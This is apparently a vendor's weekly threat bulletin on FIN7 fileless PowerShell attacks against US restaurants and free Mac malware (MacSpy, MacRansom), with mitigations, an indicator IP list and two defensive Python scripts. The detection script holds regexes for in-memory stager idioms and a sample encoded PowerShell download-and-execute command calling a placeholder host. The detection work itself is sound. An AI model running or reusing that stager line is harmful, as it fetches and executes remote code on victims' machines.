New Threat to Apple Offered on the Dark Web

This week, the Alert Logic team highlights Fileless Malware and the New Threat to Apple. Read the full report to learn more and get access to the week’s Top Malicious IP addresses.

Breach

Fileless Malware Targets US Restaurants

Researchers have detected an aggressive attack campaign against restaurants across the United States that uses a relatively new technique to keep its malware undetected by virtually all antivirus products on the market. Malicious code used in so-called fileless attacks resides almost entirely in memory, so it leaves few of the on-disk traces that traditional antivirus scanners look for. The malware is effective mainly because its payload is piped straight into memory by PowerShell rather than written to disk, so there is no file for any of the 56 most widely used AV engines to inspect. Fileless does not mean invisible, however: the PowerShell invocation, its parent process and its command line are recorded by process-creation and script block logging, and the payload itself can be recovered from memory.

References: FIN7 Targeting Restaurants With Fileless Malware | FIN7 Hitting Restaurants with Fileless Malware | Fileless Malware: An Undetectable Threat
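The PowerShell stage described above is the point at which fileless tradecraft is still visible to a defender: the process that loads the payload has a parent, a command line and, when script block logging is enabled, a decodable script. The following detection logic is an added example, not code from the original report or from the researchers it cites. It runs a few such checks over constructed process-creation events shaped like Sysmon Event ID 1 / Windows 4688 records; the parent/child process lists, the regexes and the sample command lines are assumptions made for illustration.

```python
import base64
import re

# Parent/child pairs that rarely occur legitimately: an Office document should
# not be launching a script host. (Assumed list; extend for your environment.)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Idioms of download-and-execute-in-memory stagers. Heuristic, not exhaustive.
IN_MEMORY_MARKERS = re.compile(
    r"Invoke-Expression|\bIEX\b|DownloadString|Net\.WebClient|"
    r"FromBase64String|Reflection\.Assembly|VirtualAlloc",
    re.IGNORECASE)
# powershell.exe accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc).
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w\w*\s+hidden", re.IGNORECASE)
BYPASS_POLICY = re.compile(r"-ex\w*\s+bypass", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None if absent.
    PowerShell base64-encodes the script as UTF-16LE, not UTF-8."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def analyze_event(event):
    """Return a list of finding tags for one process-creation event."""
    findings = []
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")

    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        findings.append(f"office-spawns-script-host:{parent}->{image}")

    if image in ("powershell.exe", "pwsh.exe"):
        if HIDDEN_WINDOW.search(cmd) or BYPASS_POLICY.search(cmd):
            findings.append("powershell-evasion-flags")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append("powershell-encoded-command")
        # Inspect the decoded script if there is one, else the raw command line.
        if IN_MEMORY_MARKERS.search(decoded if decoded is not None else cmd):
            findings.append("in-memory-stager-idiom")
    return findings


# Constructed sample events in the shape of Sysmon Event ID 1 / Windows 4688
# fields. They are illustrative, not telemetry from the incident above.
_STAGER = ("IEX (New-Object Net.WebClient)"
           ".DownloadString('http://stager.example.invalid/a.ps1')")
_ENCODED = base64.b64encode(_STAGER.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    # Macro-launched, hidden, encoded download-and-execute stager.
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -NoP -W Hidden -Exec Bypass -enc {_ENCODED}"},
    # Administrator running a maintenance script from a console: benign.
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\Cleanup-TempFiles.ps1"},
    # Spreadsheet spawning cmd.exe: suspicious regardless of the command.
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
]


def triage(events):
    """Return (index, findings) for every event that produced a finding."""
    return [(i, analyze_event(e)) for i, e in enumerate(events) if analyze_event(e)]


if __name__ == "__main__":
    for i, findings in triage(SAMPLE_EVENTS):
        print(i, findings)
```

The decoder matters more than the regexes: an attacker who base64-encodes the stager defeats any rule that only reads the raw command line, which is why the check looks at the decoded UTF-16LE script when one is present. None of this requires the payload to ever touch disk.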

Mitigation Strategies:

  • A file integrity monitoring (FIM) solution would detect the files the attack does write to disk, such as the initial file whose contents are loaded into memory or any persistence artifact, though not a payload that stays in memory.
  • Intrusion detection system (IDS) signatures would detect the intrusion and the network anomalies it produces.
  • A Security Operations Center team provides 24x7 security monitoring, daily log review, web application firewall management and advanced anomaly detection.
  • Mail filtering would scan incoming attachments and hyperlinks for malicious code or links.
  • Web filtering would prevent users from reaching malicious websites.

Malware

New Threat to Apple Offered on the Dark Web

Researchers discovered a new threat to Apple: two pieces of Mac malware, “MacRansom” and “MacSpy.” The two appear to have been created by the same developer and are being offered through two separate dark web portals. The researchers were able to obtain a copy of the “MacSpy” program, which is advertised as the most sophisticated malware for Mac OS X to date.

The hackers offering MacSpy on the dark net are not selling it but giving it away at no cost. The software works together with a provided Tor portal to let its users break into targeted Mac computers and collect surveillance data from them.

References: Two Mac Malware-as-a-Service Offerings Uncovered | New Threat to Apple Being Offered on The Dark Web, it is The MACSPY RAT | MACSPY – Remote Access Trojan as a Service on Dark Web


Mitigation Strategies:

  • Web filtering would prevent users from reaching malicious websites.
  • Intrusion detection system (IDS) signatures would detect the intrusion and the network anomalies it produces.
  • A Security Operations Center team provides 24x7 security monitoring, daily log review, web application firewall management and advanced anomaly detection.
  • A file integrity monitoring (FIM) solution would detect the files the malware writes or modifies on the host.
  • Log management could detect suspicious user account activity.
  • Mail filtering would scan incoming attachments and hyperlinks for malicious code or links.

This Week's Suspicious IP Addresses

4.70.0.121
4.70.0.115
4.70.0.143
4.70.0.130
4.70.0.132
239.255.255.250

*IP addresses provided by Recorded Future. Note that 239.255.255.250 is the SSDP/UPnP multicast group address rather than an individual host; traffic to it is normal on most networks, so treat that entry as noise rather than as a blockable indicator.
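Before feeding a list like the one above into an IDS or firewall, it is worth checking that each indicator can actually identify a remote host. The following Python is an added example, not code from the original report or from Recorded Future: it validates the list with the standard ipaddress module, rejecting multicast, private and similar non-routable entries, and then matches the usable indicators against a few constructed firewall log lines. The log format, the internal addresses and the timestamps in the sample log are assumptions.

```python
import ipaddress
import re

# The indicator list as printed in this report.
REPORTED_IPS = ["4.70.0.121", "4.70.0.115", "4.70.0.143",
                "4.70.0.130", "4.70.0.132", "239.255.255.250"]


def usable_indicators(ips):
    """Split a raw indicator list into routable unicast addresses worth
    matching and entries that can never identify a remote attacker host.
    Returns (usable, rejected); each rejected entry carries the reason."""
    usable, rejected = [], []
    for s in ips:
        try:
            ip = ipaddress.ip_address(s.strip())
        except ValueError:
            rejected.append((s, "not an IP address"))
            continue
        if ip.is_multicast:
            reason = "multicast"
        elif ip.is_loopback:
            reason = "loopback"
        elif ip.is_link_local:
            reason = "link-local"
        elif ip.is_private:
            reason = "private/reserved range"
        elif ip.is_unspecified:
            reason = "unspecified"
        else:
            usable.append(str(ip))
            continue
        rejected.append((s, reason))
    return usable, rejected


# Constructed firewall log lines in key=value form, not real telemetry.
SAMPLE_LOG = """\
2017-06-14T10:02:11Z fw01 ALLOW src=10.0.5.23 dst=4.70.0.121 proto=tcp dport=443
2017-06-14T10:02:13Z fw01 ALLOW src=10.0.5.23 dst=239.255.255.250 proto=udp dport=1900
2017-06-14T10:03:40Z fw01 ALLOW src=10.0.7.9 dst=198.51.100.7 proto=tcp dport=80
2017-06-14T10:04:02Z fw01 DENY src=4.70.0.132 dst=10.0.5.23 proto=tcp dport=3389
"""

KV = re.compile(r"(\w+)=(\S+)")


def match_log(log_text, indicators):
    """Return (timestamp, field, ip) for every src/dst address on the list."""
    wanted = {ipaddress.ip_address(s) for s in indicators}
    hits = []
    for line in log_text.splitlines():
        fields = dict(KV.findall(line))
        for role in ("src", "dst"):
            try:
                ip = ipaddress.ip_address(fields.get(role, ""))
            except ValueError:
                continue  # field missing or not an address
            if ip in wanted:
                hits.append((line.split()[0], role, str(ip)))
    return hits


if __name__ == "__main__":
    usable, rejected = usable_indicators(REPORTED_IPS)
    print("rejected:", rejected)
    for hit in match_log(SAMPLE_LOG, usable):
        print("hit:", hit)
```

Matching the raw list against the sample log produces three hits; matching the filtered list produces two, because the SSDP discovery traffic to 239.255.255.250 that every workstation generates is dropped before it can page anyone.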